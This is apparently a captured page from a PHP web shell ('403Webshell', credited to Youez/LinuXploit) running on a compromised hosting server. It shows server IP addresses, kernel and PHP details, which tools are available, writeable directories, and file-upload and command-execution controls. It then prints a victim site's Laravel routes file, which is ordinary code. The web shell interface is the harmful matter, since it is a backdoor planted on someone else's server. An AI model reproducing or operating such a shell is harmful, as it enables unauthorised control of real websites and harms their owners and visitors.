403Webshell
Server IP : 77.68.25.176  /  Your IP : 216.73.216.25
Web Server : Apache
System : Linux plesk 4.15.0-159-generic #167-Ubuntu SMP Tue Sep 21 08:55:05 UTC 2021 x86_64
User : dwp ( 10001)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/dazzlingwebplanet.co.uk/rightway.dazzlingwebplanet.com/routes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/dazzlingwebplanet.co.uk/rightway.dazzlingwebplanet.com/routes/web.php
<?php

//use Illuminate\Support\Facades\Route;

/*

|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

/*
 Route::get('/', function () {
    return view('welcome');
});
*/

/************************************************my code**********/

Route::get('privacy-policy', 'front\FrontController@privacy');
Route::get('terms-and-conditions', 'front\FrontController@terms');

Route::get('/our-services', 'front\FrontController@index');
Route::resource('services', 'ServiceController');

Route::get('/', 'front\FrontController@index');

Route::post('/contact-us', 'front\FrontController@saveContact');

Route::get('/login', function () {
    return view('welcome');
});

Route::get('/{url}/{sid}', 'front\FrontController@index');


Auth::routes(['verify' => true]);

Route::get('/home', 'HomeController@index')->middleware('verified');

Route::resource('pages', 'PageController');

Route::resource('socialmedia', 'SocialmediaController');

Route::resource('homesliders', 'HomesliderController');

Route::resource('ourservices', 'OurserviceController');

Route::resource('testimonials', 'TestimonialController');

Route::resource('blogcategories', 'BlogcategoryController');

Route::resource('blogs', 'BlogController');

Route::resource('blocktypes', 'BlocktypeController');

Route::resource('blocks', 'BlocksController');

Route::resource('siteinfos', 'SiteinfoController');

Route::resource('menus', 'MenuController');

Route::resource('contacts', 'ContactController');

Route::get('/{url}', 'front\FrontController@index');

Youez - 2016 - github.com/yon3zu
LinuXploit